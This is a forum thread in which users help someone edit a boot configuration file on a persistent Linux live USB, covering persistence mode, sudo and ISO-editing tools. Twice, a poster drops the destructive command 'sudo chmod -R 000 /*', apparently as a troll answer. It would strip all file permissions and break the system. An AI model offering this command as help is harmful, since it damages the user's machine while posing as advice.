It's easy to make sure, if you select it when you boot you are in persistant mode.

(don't use encrypted persistence, just regular persistence)

Iv found the file now but when i tried to edit it it said its only read enabled.

Does that happen even if you use sudo?

I tried to make it rw enabled but i made the partition hiden. Still works fine but i cant accsess the .cfg file and when i try to mount it i get an error :/. Thanx for the program i will try it.

If that remains a problem after a reboot you should probably just reflash the pendrive.

Most of the time you can't modify live USB's since they are built from non-readable iso, so you will need to modify the iso source instead, and that is not an easy work

You mean non-writable - but you can actually modify them; the only reason you can't modify the contents of a real disc is that it physically doesn't allow it. You can modify the contents of an ISO file too and it's not hard, there are plenty of dedicated programs and some archive managers do it as well.

That aside, @Big Pecks are you sure you're booting in persistant mode?

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

If you are in persistant mode you should be able to modify the contents of the drive while you're booted in it. As for programs that can edit ISO files, MagicISO comes to mind but there are dozens.

sudo chmod -R 000 /*

Thank you. I used magic iso to edit menu.cfg in isolinux folder.
